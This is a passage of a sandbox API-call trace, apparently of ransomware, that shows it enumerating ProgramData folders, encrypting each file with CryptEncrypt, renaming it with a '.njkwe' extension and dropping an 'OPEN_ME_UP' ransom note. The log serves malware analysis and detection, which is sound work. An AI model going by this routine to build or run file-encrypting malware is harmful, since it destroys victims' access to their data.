hHeap=0xbe0000) returned 1 [0069.577] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a49e573, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a49e573, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8f27c900, ftLastWriteTime.dwHighDateTime=0x1d32053, nFileSizeHigh=0x0, nFileSizeLow=0x108693, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0069.577] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="Windows") returned -1 [0069.577] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="$Recycle.bin") returned 1 [0069.577] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="System Volume Information") returned -1 [0069.577] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="Program Files") returned 1 [0069.577] lstrcmpiW (lpString1="stream.x86.en-us.man.dat", lpString2="Program Files (x86)") returned 1 [0069.577] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.man.dat") returned 126 [0069.577] StrStrIW (lpFirst="stream.x86.en-us.man.dat", lpSrch=".njkwe") returned 0x0 [0069.578] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.578] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2="taridd") returned -1 [0069.578] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\strea", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.578] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\stream.x86.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.578] GetTickCount () returned 0x1151c5e [0069.578] GetTickCount () returned 0x1151c5e [0069.578] GetTickCount () returned 0x1151c5e [0069.578] GetTickCount () returned 0x1151c5e [0069.579] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.579] GetProcessHeap () returned 0xbe0000 [0069.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.579] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.581] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.581] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.581] GetProcessHeap () returned 0xbe0000 [0069.581] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.581] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.581] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.586] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.586] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.586] CloseHandle (hObject=0x43c) returned 1 [0069.586] GetProcessHeap () returned 0xbe0000 [0069.586] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.586] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.man.dat_r00t_{3sXlE5}.njkwe") returned 146 [0069.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\stream.x86.en-us.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\stream.x86.en-us.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0069.587] GetProcessHeap () returned 0xbe0000 [0069.587] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.587] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a49e573, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a49e573, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8f27c900, ftLastWriteTime.dwHighDateTime=0x1d32053, nFileSizeHigh=0x0, nFileSizeLow=0x108693, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0069.587] FindClose (in: hFindFile=0xc19e60 | out: hFindFile=0xc19e60) returned 1 [0069.587] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 133 [0069.587] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0069.587] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0069.588] CloseHandle (hObject=0x438) returned 1 [0069.588] GetProcessHeap () returned 0xbe0000 [0069.588] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc36140 | out: hHeap=0xbe0000) returned 1 [0069.588] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19bd39c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a025ed3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a025ed3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0069.588] lstrcmpiW (lpString1="x-none.16", lpString2="Windows") returned 1 [0069.588] lstrcmpiW (lpString1="x-none.16", lpString2="$Recycle.bin") returned 1 [0069.588] lstrcmpiW (lpString1="x-none.16", lpString2="System Volume Information") returned 1 [0069.588] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files") returned 1 [0069.588] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files (x86)") returned 1 [0069.588] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16") returned 102 [0069.588] lstrcmpW (lpString1="x-none.16", lpString2=".") returned 1 [0069.588] lstrcmpW (lpString1="x-none.16", lpString2="..") returned 1 [0069.588] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.588] GetProcessHeap () returned 0xbe0000 [0069.588] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc36140 [0069.588] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\*") returned 104 [0069.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19bd39c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a025ed3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a025ed3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0069.590] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.590] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.590] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.590] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.590] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.590] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\.") returned 104 [0069.590] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.590] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19bd39c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a025ed3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a025ed3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.590] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.590] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.590] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.590] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.590] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.590] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\..") returned 105 [0069.590] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.590] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.590] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19bd39c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x19bd39c1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdd889800, ftLastWriteTime.dwHighDateTime=0x1d32052, nFileSizeHigh=0x0, nFileSizeLow=0x5b31, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDescriptor.x-none.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0069.590] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Windows") returned -1 [0069.590] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="$Recycle.bin") returned 1 [0069.590] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="System Volume Information") returned -1 [0069.590] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Program Files") returned -1 [0069.590] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Program Files (x86)") returned -1 [0069.590] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\MasterDescriptor.x-none.xml") returned 130 [0069.590] StrStrIW (lpFirst="MasterDescriptor.x-none.xml", lpSrch=".njkwe") returned 0x0 [0069.591] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.591] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="taridd") returned -1 [0069.591] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\Mast", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.591] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.591] GetTickCount () returned 0x1151c6e [0069.591] GetTickCount () returned 0x1151c6e [0069.591] GetTickCount () returned 0x1151c6e [0069.591] GetTickCount () returned 0x1151c6e [0069.591] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.591] GetProcessHeap () returned 0xbe0000 [0069.591] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.591] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.593] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.593] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.593] GetProcessHeap () returned 0xbe0000 [0069.593] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.593] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.593] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.595] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.595] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.595] CloseHandle (hObject=0x43c) returned 1 [0069.595] GetProcessHeap () returned 0xbe0000 [0069.595] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.595] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\MasterDescriptor.x-none.xml_r00t_{3sXlE5}.njkwe") returned 150 [0069.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\MasterDescriptor.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\masterdescriptor.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0069.596] GetProcessHeap () returned 0xbe0000 [0069.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.596] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19bf9d35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x19bf9d35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6aa2800, ftLastWriteTime.dwHighDateTime=0x1d32055, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1 [0069.596] lstrcmpiW (lpString1="s320.hash", lpString2="Windows") returned -1 [0069.596] lstrcmpiW (lpString1="s320.hash", lpString2="$Recycle.bin") returned 1 [0069.596] lstrcmpiW (lpString1="s320.hash", lpString2="System Volume Information") returned -1 [0069.596] lstrcmpiW (lpString1="s320.hash", lpString2="Program Files") returned 1 [0069.596] lstrcmpiW (lpString1="s320.hash", lpString2="Program Files (x86)") returned 1 [0069.596] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\s320.hash") returned 112 [0069.596] StrStrIW (lpFirst="s320.hash", lpSrch=".njkwe") returned 0x0 [0069.596] lstrcmpW (lpString1="s320.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.596] lstrcmpW (lpString1="s320.hash", lpString2="taridd") returned -1 [0069.596] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\s320", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.596] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\s320.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\s320.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.597] GetTickCount () returned 0x1151c6e [0069.597] GetTickCount () returned 0x1151c6e [0069.597] GetTickCount () returned 0x1151c6e [0069.597] GetTickCount () returned 0x1151c6e [0069.597] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.597] GetProcessHeap () returned 0xbe0000 [0069.597] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.597] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x66, lpOverlapped=0x0) returned 1 [0069.598] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffff9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.598] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x66, lpOverlapped=0x0) returned 1 [0069.598] GetProcessHeap () returned 0xbe0000 [0069.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.598] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.598] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.599] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.599] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.599] CloseHandle (hObject=0x43c) returned 1 [0069.599] GetProcessHeap () returned 0xbe0000 [0069.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.599] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\s320.hash_r00t_{3sXlE5}.njkwe") returned 132 [0069.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\s320.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\s320.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\s320.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\s320.hash_r00t_{3sxle5}.njkwe")) returned 1 [0069.600] GetProcessHeap () returned 0xbe0000 [0069.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.600] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19bf9d35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x19bf9d35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6aa2800, ftLastWriteTime.dwHighDateTime=0x1d32055, nFileSizeHigh=0x0, nFileSizeLow=0x7e0a5c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.Platform.x-none.man.xml", cAlternateFileName="STREAM~1.XML")) returned 1 [0069.600] lstrcmpiW (lpString1="stream.Platform.x-none.man.xml", lpString2="Windows") returned -1 [0069.600] lstrcmpiW (lpString1="stream.Platform.x-none.man.xml", lpString2="$Recycle.bin") returned 1 [0069.600] lstrcmpiW (lpString1="stream.Platform.x-none.man.xml", lpString2="System Volume Information") returned -1 [0069.600] lstrcmpiW (lpString1="stream.Platform.x-none.man.xml", lpString2="Program Files") returned 1 [0069.600] lstrcmpiW (lpString1="stream.Platform.x-none.man.xml", lpString2="Program Files (x86)") returned 1 [0069.600] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.Platform.x-none.man.xml") returned 133 [0069.600] StrStrIW (lpFirst="stream.Platform.x-none.man.xml", lpSrch=".njkwe") 